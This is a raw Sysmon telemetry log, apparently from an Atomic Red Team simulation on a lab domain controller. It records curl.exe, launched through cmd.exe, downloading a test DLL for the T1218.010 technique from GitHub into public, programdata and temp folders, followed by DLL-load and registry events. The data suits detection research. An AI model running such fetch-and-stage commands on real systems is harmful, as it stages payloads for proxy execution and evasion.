16:32:42.333{8B6011A9-F32A-616E-073B-01000000F101}3804C:\Windows\System32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000034354188Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-10-19 16:32:42.333{8B6011A9-F32A-616E-073B-01000000F101}3804C:\Windows\System32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000034354187Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-10-19 16:32:42.333{8B6011A9-F32A-616E-073B-01000000F101}3804C:\Windows\System32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000034354186Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-10-19 16:32:42.333{8B6011A9-F32A-616E-073B-01000000F101}3804C:\Windows\System32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 734700x800000000000000034354185Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.333{8B6011A9-F32A-616E-073B-01000000F101}3804C:\Windows\System32\Curl.exeC:\Windows\System32\rasadhlp.dll10.0.14393.0 (rs1_release.160715-1616)Remote Access AutoDial HelperMicrosoft® Windows® Operating SystemMicrosoft Corporationrasadhlp.dllMD5=FAE8D0480BDD905EEA453D3A57C8D5C6,SHA256=C1531223B8201B344A6A6474CB2D9B8A8C632250A3A6F472EC5E2D7D28ADD94CtrueMicrosoft WindowsValid 12241200x800000000000000034354184Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-10-19 16:32:42.332{8B6011A9-F32A-616E-073B-01000000F101}3804C:\Windows\System32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000034354183Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-10-19 16:32:42.332{8B6011A9-F32A-616E-073B-01000000F101}3804C:\Windows\System32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000034354182Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-10-19 16:32:42.332{8B6011A9-F32A-616E-073B-01000000F101}3804C:\Windows\System32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 734700x800000000000000034354181Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.332{8B6011A9-F32A-616E-073B-01000000F101}3804C:\Windows\System32\Curl.exeC:\Windows\System32\nsi.dll10.0.14393.3297 (rs1_release_1.191001-1045)NSI User-mode interface DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationnsi.dllMD5=994E2A6D2A0B38E0968B3998E42033AC,SHA256=491F2D1DE09C39B324BCF5800198AC7CCE755F4023F1FEB3854D33716461BC27trueMicrosoft WindowsValid 734700x800000000000000034354180Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.332{8B6011A9-F32A-616E-073B-01000000F101}3804C:\Windows\System32\Curl.exeC:\Windows\System32\dnsapi.dll10.0.14393.4350 (rs1_release.210407-2154)DNS Client API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationdnsapiMD5=D7651F99299B13D576A72643BFC44944,SHA256=589302E630C473DBDF4CE92C59F00B029FCA0C228E7111A764166E16025FA1A9trueMicrosoft WindowsValid 734700x800000000000000034354179Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.330{8B6011A9-F32A-616E-073B-01000000F101}3804C:\Windows\System32\Curl.exeC:\Windows\System32\mswsock.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft Windows Sockets 2.0 Service ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationmswsock.dllMD5=B52ACA309FD6F72105951FFBA022327B,SHA256=02AB6CCE4BF0D3F075D5E982F5A4CBDB514CE7C245EA474D7846A86CD3F13202trueMicrosoft WindowsValid 734700x800000000000000034354178Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.329{8B6011A9-F32A-616E-073B-01000000F101}3804C:\Windows\System32\Curl.exeC:\Windows\System32\IPHLPAPI.DLL10.0.14393.2339 (rs1_release_inmarket.180611-1502)IP Helper APIMicrosoft® Windows® Operating SystemMicrosoft Corporationiphlpapi.dllMD5=3CD38EDF9CA12F91131EDEE32D1C9DF5,SHA256=AF2440640BF8BDEAAF0DECDD7C354158E415ED0AA340ABA7A6CCCDC09C1E728BtrueMicrosoft WindowsValid 734700x800000000000000034354177Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.329{8B6011A9-F32A-616E-073B-01000000F101}3804C:\Windows\System32\Curl.exeC:\Windows\System32\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=5061339CE61C0B32DB8F51A95E3B2422,SHA256=60558CA374334D4C6BBAD475921538C14A9FF3422893348A0503C1F33015FD25trueMicrosoft WindowsValid 734700x800000000000000034354176Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.328{8B6011A9-F32A-616E-073B-01000000F101}3804C:\Windows\System32\Curl.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5trueMicrosoft WindowsValid 734700x800000000000000034354175Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.325{8B6011A9-F32A-616E-073B-01000000F101}3804C:\Windows\System32\Curl.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValid 734700x800000000000000034354174Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.324{8B6011A9-F32A-616E-073B-01000000F101}3804C:\Windows\System32\Curl.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000034354173Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.324{8B6011A9-F32A-616E-073B-01000000F101}3804C:\Windows\System32\Curl.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x800000000000000034354172Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.324{8B6011A9-F32A-616E-073B-01000000F101}3804C:\Windows\System32\Curl.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000034354171Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.323{8B6011A9-F32A-616E-073B-01000000F101}3804C:\Windows\System32\Curl.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000034354170Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.323{8B6011A9-F32A-616E-073B-01000000F101}3804C:\Windows\System32\Curl.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000034354169Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.323{8B6011A9-F32A-616E-073B-01000000F101}3804C:\Windows\System32\Curl.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000034354168Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.323{8B6011A9-F32A-616E-073B-01000000F101}3804C:\Windows\System32\Curl.exeC:\Windows\System32\msasn1.dll10.0.14393.0 (rs1_release.160715-1616)ASN.1 Runtime APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationmsasn1.dllMD5=299464D218A27B56684B715365D149FE,SHA256=2BFE4014E06552A9D4201EF9D1C605694AAF2B7B811265EFD91FC6D1C2D48242trueMicrosoft WindowsValid 734700x800000000000000034354167Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.322{8B6011A9-F32A-616E-073B-01000000F101}3804C:\Windows\System32\Curl.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000034354166Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.322{8B6011A9-F32A-616E-073B-01000000F101}3804C:\Windows\System32\Curl.exeC:\Windows\System32\crypt32.dll10.0.14393.4350 (rs1_release.210407-2154)Crypto API32Microsoft® Windows® Operating SystemMicrosoft CorporationCRYPT32.DLLMD5=95BA70CFA8087A209500D7D350BF3A59,SHA256=4265157E8DC2A0E32A6328D54181CC31FD24E3017E60B270623C2CDBE5FAB4FAtrueMicrosoft WindowsValid 734700x800000000000000034354165Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.321{8B6011A9-F32A-616E-073B-01000000F101}3804C:\Windows\System32\Curl.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000034354164Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.321{8B6011A9-F32A-616E-073B-01000000F101}3804C:\Windows\System32\Curl.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000034354163Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.321{8B6011A9-F32A-616E-073B-01000000F101}3804C:\Windows\System32\Curl.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000034354162Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.320{8B6011A9-F32A-616E-073B-01000000F101}3804C:\Windows\System32\Curl.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 10341000x800000000000000034354161Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.320{8B6011A9-C6FA-616E-9C35-01000000F101}41365516C:\Windows\system32\conhost.exe{8B6011A9-F32A-616E-073B-01000000F101}3804C:\Windows\System32\Curl.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000034354160Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.319{8B6011A9-F32A-616E-073B-01000000F101}3804C:\Windows\System32\Curl.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000034354159Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.319{8B6011A9-F32A-616E-073B-01000000F101}3804C:\Windows\System32\Curl.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000034354158Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.318{8B6011A9-F32A-616E-073B-01000000F101}3804C:\Windows\System32\Curl.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000034354157Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.318{8B6011A9-F32A-616E-073B-01000000F101}3804C:\Windows\System32\Curl.exeC:\Windows\System32\Curl.exe7.79.1The curl executableThe curl executablecurl, https://curl.se/curl.exeMD5=46A8FE9CE08112D542220E850323D334,SHA256=7F43DE7FB365D85CF8FEE0EC66D43B09FB3D559B02A432E5925E3748BC3BD528false-Unavailable 25542500x800000000000000034354156Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.317{8B6011A9-F32A-616E-073B-01000000F101}3804C:\Windows\System32\Curl.exeImage is replaced 10341000x800000000000000034354155Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.317{8B6011A9-888A-6164-7000-00000000F101}34483444C:\Windows\system32\csrss.exe{8B6011A9-F32A-616E-073B-01000000F101}3804C:\Windows\System32\Curl.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000034354154Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.316{8B6011A9-F329-616E-043B-01000000F101}29362664C:\Windows\system32\cmd.exe{8B6011A9-F32A-616E-073B-01000000F101}3804C:\Windows\System32\Curl.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8564|C:\Windows\system32\cmd.exe+c347|C:\Windows\system32\cmd.exe+c347|C:\Windows\system32\cmd.exe+c347|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000034354153Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.317{8B6011A9-F32A-616E-073B-01000000F101}3804C:\Windows\System32\Curl.exe7.79.1The curl executableThe curl executablecurl, https://curl.se/curl.exeC:\Windows\System32\Curl.exe -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o c:\programdata\allthethingsx64.dll C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=46A8FE9CE08112D542220E850323D334,SHA256=7F43DE7FB365D85CF8FEE0EC66D43B09FB3D559B02A432E5925E3748BC3BD528{8B6011A9-F329-616E-043B-01000000F101}2936C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Windows\System32\Curl.exe -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o c:\users\public\music\allthethingsx64.dll & C:\Windows\System32\Curl.exe -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll --output c:\users\public\music\allthethingsx64.dll & C:\Windows\System32\Curl.exe -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o c:\programdata\allthethingsx64.dll & C:\Windows\System32\Curl.exe -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o %Temp%\allthethingsx64.dll" 534500x800000000000000034354152Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.314{8B6011A9-F32A-616E-063B-01000000F101}5456C:\Windows\System32\Curl.exe 11241100x800000000000000034354151Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.301{8B6011A9-F32A-616E-063B-01000000F101}5456C:\Windows\System32\Curl.exeC:\Users\Public\Music\allthethingsx64.dll2021-10-19 16:32:42.237 23542300x800000000000000034354150Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.301{8B6011A9-F32A-616E-063B-01000000F101}5456ATTACKRANGE\AdministratorC:\Windows\System32\Curl.exeC:\Users\Public\Music\allthethingsx64.dllMD5=BB806E36DA8AF680E030BAC2EEA80DAF,SHA256=14E89184687F07212D10C5FD7CB70781982D43B6EA51B74D489A1F4E6FCE72BAfalsetrue 734700x800000000000000034354149Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.277{8B6011A9-F32A-616E-063B-01000000F101}5456C:\Windows\System32\Curl.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000034354148Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.277{8B6011A9-F32A-616E-063B-01000000F101}5456C:\Windows\System32\Curl.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000034354147Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.276{8B6011A9-F32A-616E-063B-01000000F101}5456C:\Windows\System32\Curl.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000034354146Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.276{8B6011A9-F32A-616E-063B-01000000F101}5456C:\Windows\System32\Curl.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 734700x800000000000000034354145Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.264{8B6011A9-F32A-616E-063B-01000000F101}5456C:\Windows\System32\Curl.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000034354144Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.264{8B6011A9-F32A-616E-063B-01000000F101}5456C:\Windows\System32\Curl.exeC:\Windows\System32\FWPUCLNT.DLL10.0.14393.0 (rs1_release.160715-1616)FWP/IPsec User-Mode APIMicrosoft® Windows® Operating SystemMicrosoft Corporationfwpuclnt.dllMD5=A65FA613342B08E0F760D8B13B9C135A,SHA256=C64A1EC862188D2EE1202DB02BFBF4E2DD56780905E509012799EB57FC9A88EDtrueMicrosoft WindowsValid 12241200x800000000000000034354143Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-10-19 16:32:42.263{8B6011A9-F32A-616E-063B-01000000F101}5456C:\Windows\System32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000034354142Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-10-19 16:32:42.263{8B6011A9-F32A-616E-063B-01000000F101}5456C:\Windows\System32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000034354141Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-10-19 16:32:42.263{8B6011A9-F32A-616E-063B-01000000F101}5456C:\Windows\System32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000034354140Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-10-19 16:32:42.263{8B6011A9-F32A-616E-063B-01000000F101}5456C:\Windows\System32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 734700x800000000000000034354139Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.262{8B6011A9-F32A-616E-063B-01000000F101}5456C:\Windows\System32\Curl.exeC:\Windows\System32\rasadhlp.dll10.0.14393.0 (rs1_release.160715-1616)Remote Access AutoDial HelperMicrosoft® Windows® Operating SystemMicrosoft Corporationrasadhlp.dllMD5=FAE8D0480BDD905EEA453D3A57C8D5C6,SHA256=C1531223B8201B344A6A6474CB2D9B8A8C632250A3A6F472EC5E2D7D28ADD94CtrueMicrosoft WindowsValid 12241200x800000000000000034354138Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-10-19 16:32:42.262{8B6011A9-F32A-616E-063B-01000000F101}5456C:\Windows\System32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000034354137Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-10-19 16:32:42.262{8B6011A9-F32A-616E-063B-01000000F101}5456C:\Windows\System32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000034354136Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-10-19 16:32:42.262{8B6011A9-F32A-616E-063B-01000000F101}5456C:\Windows\System32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 734700x800000000000000034354135Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.261{8B6011A9-F32A-616E-063B-01000000F101}5456C:\Windows\System32\Curl.exeC:\Windows\System32\nsi.dll10.0.14393.3297 (rs1_release_1.191001-1045)NSI User-mode interface DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationnsi.dllMD5=994E2A6D2A0B38E0968B3998E42033AC,SHA256=491F2D1DE09C39B324BCF5800198AC7CCE755F4023F1FEB3854D33716461BC27trueMicrosoft WindowsValid 734700x800000000000000034354134Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.261{8B6011A9-F32A-616E-063B-01000000F101}5456C:\Windows\System32\Curl.exeC:\Windows\System32\dnsapi.dll10.0.14393.4350 (rs1_release.210407-2154)DNS Client API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationdnsapiMD5=D7651F99299B13D576A72643BFC44944,SHA256=589302E630C473DBDF4CE92C59F00B029FCA0C228E7111A764166E16025FA1A9trueMicrosoft WindowsValid 734700x800000000000000034354133Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.260{8B6011A9-F32A-616E-063B-01000000F101}5456C:\Windows\System32\Curl.exeC:\Windows\System32\mswsock.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft Windows Sockets 2.0 Service ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationmswsock.dllMD5=B52ACA309FD6F72105951FFBA022327B,SHA256=02AB6CCE4BF0D3F075D5E982F5A4CBDB514CE7C245EA474D7846A86CD3F13202trueMicrosoft WindowsValid 734700x800000000000000034354132Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.259{8B6011A9-F32A-616E-063B-01000000F101}5456C:\Windows\System32\Curl.exeC:\Windows\System32\IPHLPAPI.DLL10.0.14393.2339 (rs1_release_inmarket.180611-1502)IP Helper APIMicrosoft® Windows® Operating SystemMicrosoft Corporationiphlpapi.dllMD5=3CD38EDF9CA12F91131EDEE32D1C9DF5,SHA256=AF2440640BF8BDEAAF0DECDD7C354158E415ED0AA340ABA7A6CCCDC09C1E728BtrueMicrosoft WindowsValid 734700x800000000000000034354131Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.258{8B6011A9-F32A-616E-063B-01000000F101}5456C:\Windows\System32\Curl.exeC:\Windows\System32\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=5061339CE61C0B32DB8F51A95E3B2422,SHA256=60558CA374334D4C6BBAD475921538C14A9FF3422893348A0503C1F33015FD25trueMicrosoft WindowsValid 734700x800000000000000034354130Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 